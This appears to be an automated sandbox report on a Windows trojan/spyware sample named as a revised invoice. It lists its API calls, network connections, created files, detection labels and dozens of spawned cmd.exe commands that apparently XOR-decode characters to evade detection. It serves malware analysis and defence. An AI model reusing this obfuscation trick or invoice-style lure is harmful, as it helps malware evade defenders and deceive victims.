Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833

Source: unknown	HTTPS traffic detected: 172.253.63.113:443 -> 192.168.11.20:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.253.115.132:443 -> 192.168.11.20:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49841 version: TLS 1.2

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Code function: 0_2_00404FCD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404FCD

Source: Conhost.exe

Process created: 86

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 0_2_004030E2 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_004030E2
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_004030E2 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		131_2_004030E2

Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 0_2_0040480C	0_2_0040480C
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 0_2_004062CF	0_2_004062CF
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 0_2_00406AA6	0_2_00406AA6
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0040480C	131_2_0040480C
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_004062CF	131_2_004062CF
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00406AA6	131_2_00406AA6
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015C074	131_2_0015C074
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00156108	131_2_00156108
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015C350	131_2_0015C350
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015E438	131_2_0015E438
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015C630	131_2_0015C630
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00156730	131_2_00156730
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015B798	131_2_0015B798
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00159858	131_2_00159858
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015BAB0	131_2_0015BAB0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00154AD9	131_2_00154AD9
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015BD93	131_2_0015BD93
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015AF28	131_2_0015AF28
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015B0F0	131_2_0015B0F0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_00153578	131_2_00153578
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015F780	131_2_0015F780
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015D7F8	131_2_0015D7F8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015D7E7	131_2_0015D7E7
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_0015FBF0	131_2_0015FBF0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFFB50	131_2_33EFFB50
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF7710	131_2_33EF7710
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF4A53	131_2_33EF4A53
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF0D60	131_2_33EF0D60
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFB0B8	131_2_33EFB0B8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF3410	131_2_33EF3410
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF6F88	131_2_33EF6F88
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF6F79	131_2_33EF6F79
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFFB40	131_2_33EFFB40
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFD308	131_2_33EFD308
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF7F06	131_2_33EF7F06
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFAB10	131_2_33EFAB10
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFF6E9	131_2_33EFF6E9
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFD2F9	131_2_33EFD2F9
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFF6F8	131_2_33EFF6F8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFBEA2	131_2_33EFBEA2
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFF2A0	131_2_33EFF2A0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFF290	131_2_33EFF290
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFEE48	131_2_33EFEE48
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFEE3A	131_2_33EFEE3A
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFCE31	131_2_33EFCE31
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFE9E0	131_2_33EFE9E0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF75F8	131_2_33EF75F8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFE9F0	131_2_33EFE9F0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFE588	131_2_33EFE588
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFE598	131_2_33EFE598
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF7574	131_2_33EF7574
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFE140	131_2_33EFE140
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF0D51	131_2_33EF0D51
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFE131	131_2_33EFE131
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF7930	131_2_33EF7930
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF0900	131_2_33EF0900
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFDCE8	131_2_33EFDCE8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF08F1	131_2_33EF08F1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFDCD8	131_2_33EFDCD8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFA8AA	131_2_33EFA8AA
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EFB0A8	131_2_33EFB0A8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF04A0	131_2_33EF04A0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF0490	131_2_33EF0490
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF0040	131_2_33EF0040
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF0006	131_2_33EF0006
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF8000	131_2_33EF8000
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_33EF3400	131_2_33EF3400
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BD240	131_2_360BD240
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BD890	131_2_360BD890
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B38B8	131_2_360B38B8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BDEE0	131_2_360BDEE0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BAD08	131_2_360BAD08
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BB910	131_2_360BB910
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BE530	131_2_360BE530
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B9750	131_2_360B9750
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BBF60	131_2_360BBF60
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BEB78	131_2_360BEB78
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BC5A8	131_2_360BC5A8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BCBF0	131_2_360BCBF0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B3008	131_2_360B3008
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BA000	131_2_360BA000
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B0006	131_2_360B0006
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B8A10	131_2_360B8A10
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B5E20	131_2_360B5E20
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B8A20	131_2_360B8A20
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B5E30	131_2_360B5E30
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BD236	131_2_360BD236
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BA44A	131_2_360BA44A
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B1A41	131_2_360B1A41
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B0040	131_2_360B0040
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BA458	131_2_360BA458
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B1A50	131_2_360B1A50
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B3450	131_2_360B3450
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B8E6A	131_2_360B8E6A
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B3460	131_2_360B3460
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B8E78	131_2_360B8E78
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B048A	131_2_360B048A
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B7888	131_2_360B7888
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BD880	131_2_360BD880
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B1E98	131_2_360B1E98
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B0498	131_2_360B0498
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B7898	131_2_360B7898
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B5AAB	131_2_360B5AAB
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B38A9	131_2_360B38A9
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B1EA8	131_2_360B1EA8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BA8A0	131_2_360BA8A0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B5AB8	131_2_360B5AB8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BA8B0	131_2_360BA8B0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B92C0	131_2_360B92C0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BDEDE	131_2_360BDEDE
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B92D0	131_2_360B92D0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B08E0	131_2_360B08E0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BACFA	131_2_360BACFA
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B08F0	131_2_360B08F0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B22F0	131_2_360B22F0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B4F0A	131_2_360B4F0A
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B7D09	131_2_360B7D09
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B2300	131_2_360B2300
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BB900	131_2_360BB900
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B7D18	131_2_360B7D18
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BE523	131_2_360BE523
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B6B20	131_2_360B6B20
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B0D38	131_2_360B0D38
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B6B30	131_2_360B6B30
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B0D48	131_2_360B0D48
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B9740	131_2_360B9740
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B2758	131_2_360B2758
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B2752	131_2_360B2752
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BBF51	131_2_360BBF51
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BEB69	131_2_360BEB69
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B8161	131_2_360B8161
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B8170	131_2_360B8170
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B9B99	131_2_360B9B99
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BC598	131_2_360BC598
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B1190	131_2_360B1190
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B2BA8	131_2_360B2BA8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B9BA8	131_2_360B9BA8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B11A0	131_2_360B11A0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B85B8	131_2_360B85B8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B2BB0	131_2_360B2BB0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B4FB0	131_2_360B4FB0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B85C8	131_2_360B85C8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360BCBDF	131_2_360BCBDF
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B15E8	131_2_360B15E8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B15F8	131_2_360B15F8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B2FFC	131_2_360B2FFC
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_360B9FF0	131_2_360B9FF0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_36DD68F0	131_2_36DD68F0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_36DD0040	131_2_36DD0040
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_36DD0011	131_2_36DD0011
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_36DE1440	131_2_36DE1440
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 131_2_36DE1401	131_2_36DE1401

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Code function: String function: 004029FD appears 49 times

Source: Revised PI_2024.exe, 00000000.00000002.82255661462.0000000000440000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameopsplitningen.exeH vs Revised PI_2024.exe
Source: Revised PI_2024.exe, 00000083.00000000.82181094604.0000000000440000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameopsplitningen.exeH vs Revised PI_2024.exe
Source: Revised PI_2024.exe, 00000083.00000002.86892283444.0000000033B77000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Revised PI_2024.exe
Source: Revised PI_2024.exe	Binary or memory string: OriginalFilenameopsplitningen.exeH vs Revised PI_2024.exe

Source: Revised PI_2024.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@389/7@5/5

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Code function: 0_2_004042DD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004042DD

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\Revised PI_2024.exe

File created: C:\Users\user\AppData\Local\haandsbredderne

Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Revised PI_2024.exe

File created: C:\Users\user\AppData\Local\Temp\nsf2A49.tmp

Jump to behavior

Source: Revised PI_2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Revised PI_2024.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Revised PI_2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Revised PI_2024.exe

ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\Revised PI_2024.exe

File read: C:\Users\user\Desktop\Revised PI_2024.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Revised PI_2024.exe "C:\Users\user\Desktop\Revised PI_2024.exe"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
